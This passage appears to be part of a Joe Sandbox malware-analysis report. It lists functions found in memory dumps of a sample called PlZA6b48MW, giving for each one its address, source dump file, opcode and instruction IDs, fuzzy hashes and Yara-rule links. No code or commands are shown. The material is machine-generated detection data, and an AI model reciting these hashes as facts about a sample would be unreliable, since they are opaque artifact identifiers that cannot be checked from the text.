                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2815f054130357cf8022f580400d0641f528c7a9d99814b4f6f15d49ce83b87d
                                                                            • Instruction ID: 184e8394406f640445b5729eb72e456736841d4a57807fee12d790756a93d212
                                                                            • Opcode Fuzzy Hash: 2815f054130357cf8022f580400d0641f528c7a9d99814b4f6f15d49ce83b87d
                                                                            • Instruction Fuzzy Hash: 7211D510A1E46F46E73D8268C4F49B873D1EB5030572646FBC05B8B4AAC82CBA81D7A0
                                                                            Function 00007FFD9BC72790 Relevance: .1, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a8b5ae1d03ecdb8b37e5ba0ee9368edff77b60e8a36ad466ae991f7cc8cbdd58
                                                                            • Instruction ID: 03ea3cbaa3b8282b7c772bc0d275a088a1af63a0c396c10125292f4c67c30ec9
                                                                            • Opcode Fuzzy Hash: a8b5ae1d03ecdb8b37e5ba0ee9368edff77b60e8a36ad466ae991f7cc8cbdd58
                                                                            • Instruction Fuzzy Hash: 4A112711A1F42E87F63C9AE894F05B87791FB91301B2546B9D05B8F0EACC2CFA819790
                                                                            Function 00007FFD9BC71810 Relevance: .1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6053fdffd845a3fc5e0da247fae6373793cee398e64e7f82eae205eb9cc39b57
                                                                            • Instruction ID: 62e2919f965e240d67728ed5f37488ca44cd4212e0967e60923edd8d5ccdbecb
                                                                            • Opcode Fuzzy Hash: 6053fdffd845a3fc5e0da247fae6373793cee398e64e7f82eae205eb9cc39b57
                                                                            • Instruction Fuzzy Hash: E3110830718A0D4FD768EF64D4609E9B3A1FF48310B40067AD14EC34D3DE24F6168380
                                                                            Function 00007FFD9B8BD9C0 Relevance: .1, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 864b620768910e98d79fd1d7aa3eebf39205ed54e8431f77786b3980cd23695d
                                                                            • Instruction ID: 62053ee4d15391c79963a633bd636c6848f4e7e322b4eec7e22db76e0332d73c
                                                                            • Opcode Fuzzy Hash: 864b620768910e98d79fd1d7aa3eebf39205ed54e8431f77786b3980cd23695d
                                                                            • Instruction Fuzzy Hash: E9012122B0F66A87E718A73CA8755F973A0EF55629B484177C04DC74D3ED18A8878784
                                                                            Function 00007FFD9BC70B29 Relevance: .1, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 68447ac6f47c01c4fce42680acd7a58f0cb523a95250837dfbc4e07ed92e08e4
                                                                            • Instruction ID: 05577451b6c5086173e047a816dc52001b2140c792eaedb26da1ad6b0fb2dcf7
                                                                            • Opcode Fuzzy Hash: 68447ac6f47c01c4fce42680acd7a58f0cb523a95250837dfbc4e07ed92e08e4
                                                                            • Instruction Fuzzy Hash: 27115C31A0F78E1FDB31C7B048645AD7FA5EF57701F0601BAD045D70A2C9682A15C750
                                                                            Function 00007FFD9BC7168E Relevance: .1, Instructions: 58COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 214cbb6bb5b0e40c8f6fbaf82eb5a977dfe304ad740cbc26eac88988f9ac2f33
                                                                            • Instruction ID: 5aecca607bb26bdfa67e765f84632e08c9230a86718ebc29960a4b33a68475c9
                                                                            • Opcode Fuzzy Hash: 214cbb6bb5b0e40c8f6fbaf82eb5a977dfe304ad740cbc26eac88988f9ac2f33
                                                                            • Instruction Fuzzy Hash: 9F11213134860E8FE719DFA8D4A4AE9B7A1FF58315F15026EDA49C35E2CB20A6658780
                                                                            Function 00007FFD9B880C38 Relevance: .1, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0cab9473edb6007aa99ea9e6e587afa9ca456fd54f0c71c152f78a9d2eb81809
                                                                            • Instruction ID: dff0be1ec1985ade48eef055351781166838b875604cddd851b1dac1c105ac87
                                                                            • Opcode Fuzzy Hash: 0cab9473edb6007aa99ea9e6e587afa9ca456fd54f0c71c152f78a9d2eb81809
                                                                            • Instruction Fuzzy Hash: D811E735B1EA8D8FE722DFA8886119C7BB1EF45710F0645F7C094DB1A2D53866458780
                                                                            Function 00007FFD9B8B3015 Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f3d6fc5b26e8aa3907600b2911e759c00ce30f3a0c4f1580dca062f4dcbeb81a
                                                                            • Instruction ID: f0184ee5896c64b11ecfe5d5fe82ff1092c6f81233ff834d672b028d7db2848f
                                                                            • Opcode Fuzzy Hash: f3d6fc5b26e8aa3907600b2911e759c00ce30f3a0c4f1580dca062f4dcbeb81a
                                                                            • Instruction Fuzzy Hash: 2301A932B0D96A8BEBA8EB68C8657A87791FF58310F05027AD45DC32D5DE1869424B81
                                                                            Function 00007FFD9B8C46F2 Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1a0dea9657c0d2f7a0b3c6654703f95e822d0bc8b9a1b8a66a6c3f378a3a8c1a
                                                                            • Instruction ID: 28e15fb1c97cb01c5f9f183ab91b58729882eb81489c4a7a311704a56fd8e1ca
                                                                            • Opcode Fuzzy Hash: 1a0dea9657c0d2f7a0b3c6654703f95e822d0bc8b9a1b8a66a6c3f378a3a8c1a
                                                                            • Instruction Fuzzy Hash: D1118671B0950ECBFBA8FB9488666B93392EF98350F59017AD01DC31D6DE2C69424741
                                                                            Function 00007FFD9BC70CF9 Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 043a19d1e74c1134dd1d6ef1c6827da953c99d5be79168edc5261536921ed1eb
                                                                            • Instruction ID: a89dbdb4e64b3f4c3911864227564a24394c315948787774ff9a63a9f3ddb76b
                                                                            • Opcode Fuzzy Hash: 043a19d1e74c1134dd1d6ef1c6827da953c99d5be79168edc5261536921ed1eb
                                                                            • Instruction Fuzzy Hash: 1501F531B0DA4C8FDB59FBE898A16ECB7B1FF19310F45016ED049C3293DA24A912C740
                                                                            Function 00007FFD9BC74888 Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5d9b328e7e8ac265d76ba95d34858fbb022ac6cdfa00a6e9ee8f2ffeae0ba99a
                                                                            • Instruction ID: 646c0af0ef57cb80afa3e23486b3aa4e063b809f9bca89289e42569e6c3e0c74
                                                                            • Opcode Fuzzy Hash: 5d9b328e7e8ac265d76ba95d34858fbb022ac6cdfa00a6e9ee8f2ffeae0ba99a
                                                                            • Instruction Fuzzy Hash: 4F115A42F0F1EFA2F63851F424B11BC5544EF84220F1A01FED41EDB1E6DC4D2A8162A2
                                                                            Function 00007FFD9B8C5012 Relevance: .1, Instructions: 52COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e3ab244b0d9a0daab1ded28ef049e7823611d026c3169853c3a517a8aac6653a
                                                                            • Instruction ID: 7f55135b30ee2408756957ef188fbd2eb4068ebebb2daa1f87a3a9e44d51c09b
                                                                            • Opcode Fuzzy Hash: e3ab244b0d9a0daab1ded28ef049e7823611d026c3169853c3a517a8aac6653a
                                                                            • Instruction Fuzzy Hash: 73010C71E0850D8FDB58EB98C4A5AAD77F2EB9C310F15412ED41AE3395CF2869418B41
                                                                            Function 00007FFD9B880C40 Relevance: .1, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f55ccc75b0ddbacaf6541b72e714224925d8eefd141fdd6bfad0d315c39ea941
                                                                            • Instruction ID: 746515e8b20481b43a312154eea7961bce95d500439dd2e424ea8d5c05f8eff7
                                                                            • Opcode Fuzzy Hash: f55ccc75b0ddbacaf6541b72e714224925d8eefd141fdd6bfad0d315c39ea941
                                                                            • Instruction Fuzzy Hash: 8011E531F1EA8D8FE722DFA4886009D7FB1EF46710F0641F7C094DB2A2D9386A458780
                                                                            Function 00007FFD9BC7669E Relevance: .1, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 899e939a85d1a99ed9a3a1b1342c24ae6f8b158b06b64b55dd726777e26fde9c
                                                                            • Instruction ID: c79988d51721db99ff6cdb1cc7725febe96d1774d42d20336844d428bd877abb
                                                                            • Opcode Fuzzy Hash: 899e939a85d1a99ed9a3a1b1342c24ae6f8b158b06b64b55dd726777e26fde9c
                                                                            • Instruction Fuzzy Hash: AD11663034864E4FE718CB6CC4A47E87791FF85315F5402BEDA49C72E2C665E658C380
                                                                            Function 00007FFD9B8BE38F Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6495d14fba777a4e675a4a95b3ad62525e80fe3994a074da0ddd388570ad7225
                                                                            • Instruction ID: 9aab1f0de55697235fa4f05952278c425d77c7b06cc57955d3206b43229fdcd6
                                                                            • Opcode Fuzzy Hash: 6495d14fba777a4e675a4a95b3ad62525e80fe3994a074da0ddd388570ad7225
                                                                            • Instruction Fuzzy Hash: 95017132F0952E8FEBE4D6A894657FD73E1EF9C312F054432E109D7590DE28AA818BC0
                                                                            Function 00007FFD9BC70C69 Relevance: .0, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a43e20cec7b09ba04eb6a85a95011087e535ad7dd94976d82b0c4cb503e1ab2d
                                                                            • Instruction ID: ebff837309ce2895a648b5408014bf309dee0fbac19781295a2f7e1a9a972afd
                                                                            • Opcode Fuzzy Hash: a43e20cec7b09ba04eb6a85a95011087e535ad7dd94976d82b0c4cb503e1ab2d
                                                                            • Instruction Fuzzy Hash: 31014F31B08A1D8FCB58EB9CD4A19ACF3A1FF48714B55426AD45ED3692CB20BD22C7C4
                                                                            Function 00007FFD9B880C48 Relevance: .0, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 421debad41467fb6ccc61581254d0dd1d70276ffa3fc9816191ea8b129ea36b5
                                                                            • Instruction ID: 6519aef3443bc1cd8b35089857717ddef662785ed6f77057937f2e419bb79be0
                                                                            • Opcode Fuzzy Hash: 421debad41467fb6ccc61581254d0dd1d70276ffa3fc9816191ea8b129ea36b5
                                                                            • Instruction Fuzzy Hash: 31018031E1EA8D9FE726DFA4886049D7FB1EF46710F1641F7C0A4DB2A2D9386A458780
                                                                            Function 00007FFD9BC7681C Relevance: .0, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 28267864224c7872feb28f8c85905f70fd1c090aab44930dc7f51958547c08eb
                                                                            • Instruction ID: 65b28ebc7ebe3c4d3b7680be7c6bb3415836b3008d05f70b11da05d562d30ba0
                                                                            • Opcode Fuzzy Hash: 28267864224c7872feb28f8c85905f70fd1c090aab44930dc7f51958547c08eb
                                                                            • Instruction Fuzzy Hash: C3014C20A1DBA90FD318D73458149E9BB90FF0521074006BED18FC74D3EA28A50AC380
                                                                            Function 00007FFD9B894132 Relevance: .0, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 61efe604e4432ec8f6520246f92229d6ee3d9ae947c138132d02513875117392
                                                                            • Instruction ID: 08482c3cdf52dca10645b34aabce364de2cd48bfcdec60f63411d68c40358be6
                                                                            • Opcode Fuzzy Hash: 61efe604e4432ec8f6520246f92229d6ee3d9ae947c138132d02513875117392
                                                                            • Instruction Fuzzy Hash: D0011B30F1941F8BEF24DB88D864ABEB6B1FF54354F400239E415A72E9DF7869418780
                                                                            Function 00007FFD9B8C36A4 Relevance: .0, Instructions: 40COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1aa990942bac35ce410b6a38375218f4109bb57bb441075a8972e2d7b328441a
                                                                            • Instruction ID: a5a3bffcd9f3e1ae85b97ea3e7697f67170dc076b28e80e29f0d30ed16aa2247
                                                                            • Opcode Fuzzy Hash: 1aa990942bac35ce410b6a38375218f4109bb57bb441075a8972e2d7b328441a
                                                                            • Instruction Fuzzy Hash: 33011AB1F0950F8FE764EB98C855ABE73E1FB58711F014636D019D23A5EB386A428B80
                                                                            Function 00007FFD9BC75C08 Relevance: .0, Instructions: 40COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b4898335257f96cd23c043193a1041f6091cb9363576287b8a3c2d118217b76c
                                                                            • Instruction ID: 55a6e559218cb3be9f19ba340dde4ff2e07d92529fcf536bca7e2ce924b8d567
                                                                            • Opcode Fuzzy Hash: b4898335257f96cd23c043193a1041f6091cb9363576287b8a3c2d118217b76c
                                                                            • Instruction Fuzzy Hash: C001F47070E94EAFD728975880F452CB3A1FF487247A1427DC04D87592CF25BD128785
                                                                            Function 00007FFD9B886C1A Relevance: .0, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 742aba1b52c7853808dbb1f05cce333e8f30ac77d8fc498765c50e016f566991
                                                                            • Instruction ID: 11d4f90de5cee1d6321c45225828ac56787fe095b9c3b9b7e0404c67263e6410
                                                                            • Opcode Fuzzy Hash: 742aba1b52c7853808dbb1f05cce333e8f30ac77d8fc498765c50e016f566991
                                                                            • Instruction Fuzzy Hash: 3C011734A08E1DCFCB65EF54C495AA973B1FB5C300F5105A9D00ED7260CB34AA45CF81
                                                                            Function 00007FFD9B883696 Relevance: .0, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 65e8be95179b52e3161798d2a7ed0564b4310aa8133acfcddd3b2d38e3e24a30
                                                                            • Instruction ID: fbd84bb240e6ae2ac9753cf1f42eaf4c11986d7e39ea946345689bbb6a2b7331
                                                                            • Opcode Fuzzy Hash: 65e8be95179b52e3161798d2a7ed0564b4310aa8133acfcddd3b2d38e3e24a30
                                                                            • Instruction Fuzzy Hash: EA013630E5DD1E8BEB74EB58CC606F873A1EF58311F1601B9D45ED32A2CD786AC18A00
                                                                            Function 00007FFD9BC74E82 Relevance: .0, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 784cf17fcb851e65293729424d6478443dd75b45d14f816f324d237625de8cea
                                                                            • Instruction ID: 891bfe6b1fa4d262e253a58a1efd8a9051e8049aabdf0bb15959644a91ea2024
                                                                            • Opcode Fuzzy Hash: 784cf17fcb851e65293729424d6478443dd75b45d14f816f324d237625de8cea
                                                                            • Instruction Fuzzy Hash: 15F0623154F3C9AFD7229BB088A14AD7FA4EF43220B1A01EAD485C70A2D52C5746C762
                                                                            Function 00007FFD9B8BB609 Relevance: .0, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: eab761df1f901a2800449163705961ad9ec1baa430f8a28f6b3ce071fdfc6890
                                                                            • Instruction ID: 09986c0eb061ce59d61a45bfc836a8dcf1feb46916f9dd4b75226c717d720ff9
                                                                            • Opcode Fuzzy Hash: eab761df1f901a2800449163705961ad9ec1baa430f8a28f6b3ce071fdfc6890
                                                                            • Instruction Fuzzy Hash: 43F02021B0DBC80FC729962A88A5021BFE1DF9B50130A12EFC086C72A3DC48AC868345
                                                                            Function 00007FFD9B894179 Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c6f1ec8432fc063f0a9acc6174494944ec87edc1eef8b69d71ca7119501a3840
                                                                            • Instruction ID: 4aba9180803d2e49e9573d5cac88bbee90c85e91e418756c964a6d463a006364
                                                                            • Opcode Fuzzy Hash: c6f1ec8432fc063f0a9acc6174494944ec87edc1eef8b69d71ca7119501a3840
                                                                            • Instruction Fuzzy Hash: 8FF04F70B1590F8BEF68DB88D864ABEB7B1FF54315F40423AD416D32A4DF746A018780
                                                                            Function 00007FFD9B8BBD89 Relevance: .0, Instructions: 34COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8dda6cd075f5d8274467961c258c899b694a2be50fd9d4e80f1c3b81b317f4d2
                                                                            • Instruction ID: 065e3fc4ed9d74ecd78a6b11d4d02c23c84905971c1af2ed8b5706e152c3ba51
                                                                            • Opcode Fuzzy Hash: 8dda6cd075f5d8274467961c258c899b694a2be50fd9d4e80f1c3b81b317f4d2
                                                                            • Instruction Fuzzy Hash: 51F08951B0591E5FE698EB6888AA7B472D5EF5C345F040175E40CC3596DE2829414B81
                                                                            Function 00007FFD9B8948B9 Relevance: .0, Instructions: 34COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 76b81fdce47ff64edbe0a1634efa5f1a4a3eddc49854e23ca9c11aa8e935cd64
                                                                            • Instruction ID: b9e5b5c48b04b450519c08c136d6a94f4b61ae6d4ff30d25b2faca5d35ac1ff7
                                                                            • Opcode Fuzzy Hash: 76b81fdce47ff64edbe0a1634efa5f1a4a3eddc49854e23ca9c11aa8e935cd64
                                                                            • Instruction Fuzzy Hash: ECF05430B0D95E4BEE35AB8894606BA3291EF49314F1645B9D41ED31F7DE28AA414580
                                                                            Function 00007FFD9B8BEF79 Relevance: .0, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 85e3ab0175969e7d058c9fdee1d4b60e17278a64a5870a6ec53384c4806f3079
                                                                            • Instruction ID: 17706687ca2c6b2af447020adc272fbac286e4e30f21643becdf47a75885a5bf
                                                                            • Opcode Fuzzy Hash: 85e3ab0175969e7d058c9fdee1d4b60e17278a64a5870a6ec53384c4806f3079
                                                                            • Instruction Fuzzy Hash: 14F0B431F08D3D8FE7A8E774909126DB2D2EB98301F124171D009C32E9DE786A414BC0
                                                                            Function 00007FFD9BC75F64 Relevance: .0, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ba6d858317dfcaf6428f89d24784d6269108512cad9d645248c843e3b6bebaff
                                                                            • Instruction ID: f00cf6a8694dd9e70e22c32d5f6153f7eba7cd396e42185c2b1ab48a4d4ef270
